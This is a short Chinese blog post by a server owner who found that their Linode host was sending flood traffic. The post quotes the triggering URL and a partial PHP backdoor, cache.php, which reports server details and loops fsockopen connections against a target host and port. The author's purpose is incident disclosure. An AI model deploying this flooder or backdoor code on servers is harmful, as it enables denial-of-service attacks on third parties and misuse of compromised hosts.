联系站长! 傻子-跸西blog 傻子-跸西微blog
顶部

底部
Feed on
Posts
Comments

晚上手机收到linode发来的短信.说流量超出了我设置限定的范围了.我一看牛逼!每秒50M左右流量发包

通过查找发现了用来攻击的访问连接:

http://这里是网站地址/cache.php?host=98.126.201.212&port=80&time=163

cache代码为:

0){
                echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
                exit;
            }
        exit;
    }
$max_time = time()+$exec_time;
while(1){
    $packets++;
    if(time() > $max_time or $exec_time != 163){
        break;
    }
    $fp = fsockopen("tcp://$host", $port, $errno, $errstr, 0);
}

?> 

网上搜到一个小工具对大家应该有用也发出来

百度关键词:“自己写的一个批量查找文件内容的php程序”

最后推荐两个小博客
http://hi.baidu.com/wcj343169893/home
http://hi.baidu.com/opensourebyxu

有什么想法,说两句吧